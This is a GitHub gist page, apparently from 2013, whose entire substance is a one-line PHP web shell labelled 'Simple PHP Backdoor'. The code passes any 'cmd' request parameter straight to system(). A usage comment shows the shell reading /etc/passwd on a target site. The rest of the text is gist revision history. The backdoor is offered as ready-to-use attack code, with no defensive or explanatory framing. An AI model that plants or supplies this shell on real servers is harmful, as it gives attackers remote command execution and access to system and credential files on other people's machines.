Skip to content

Instantly share code, notes, and snippets.

@sente
Last active September 21, 2025 08:23
Show Gist options
  • Select an option

  • Save sente/4dbb2b7bdda2647ba80b to your computer and use it in GitHub Desktop.

Select an option

Save sente/4dbb2b7bdda2647ba80b to your computer and use it in GitHub Desktop.

Revisions

  1. @themightyshiv themightyshiv renamed this gist Nov 16, 2013. 1 changed file with 0 additions and 0 deletions.
  2. @themightyshiv themightyshiv renamed this gist Nov 16, 2013. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  3. @themightyshiv themightyshiv renamed this gist Nov 16, 2013. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  4. @themightyshiv themightyshiv created this gist Nov 16, 2013.
    3 changes: 3 additions & 0 deletions One-Liner-PHP-Shell
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,3 @@
    <!-- Simple PHP Backdoor By DK (One-Liner Version) -->
    <!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
    <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>